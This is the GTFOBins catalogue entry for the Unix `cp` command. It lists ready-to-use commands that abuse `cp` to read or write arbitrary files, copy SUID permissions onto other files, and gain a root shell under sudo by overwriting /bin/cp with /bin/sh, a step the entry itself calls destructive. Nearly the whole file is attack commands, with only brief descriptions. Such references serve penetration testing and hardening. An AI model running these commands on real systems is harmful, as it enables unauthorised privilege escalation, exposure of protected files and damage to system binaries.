GTFOBins.github.io/_gtfobins/cp.md

---
functions:
  file-read:
    - code: |
        LFILE=file_to_read
        cp "$LFILE" /dev/stdout
  file-write:
    - code: |
        LFILE=file_to_write
        echo "DATA" | cp /dev/stdin "$LFILE"
  suid:
    - code: |
        LFILE=file_to_write
        echo "DATA" | ./cp /dev/stdin "$LFILE"
    - description: This can be used to copy and then read or write files from a restricted file system or with elevated privileges. (The GNU version of `cp` has the `--parents` option, which also creates the directory hierarchy specified in the source path under the destination folder.)
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo "DATA" > "$TF"
        ./cp "$TF" "$LFILE"
    - description: This can copy SUID permissions from any SUID binary (e.g., `cp` itself) to another.
      code: |
        LFILE=file_to_change
        ./cp --attributes-only --preserve=all ./cp "$LFILE"
  sudo:
    - code: |
        LFILE=file_to_write
        echo "DATA" | sudo cp /dev/stdin "$LFILE"
    - description: This can be used to copy and then read or write files from a restricted file system or with elevated privileges. (The GNU version of `cp` has the `--parents` option, which also creates the directory hierarchy specified in the source path under the destination folder.)
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo "DATA" > "$TF"
        sudo cp "$TF" "$LFILE"
    - description: This overwrites `cp` itself with a shell (or any other executable) that is then executed as root, useful when a `sudo` rule only allows running `cp` by path. Warning, this is a destructive action.
      code: |
        sudo cp /bin/sh /bin/cp
        sudo cp
---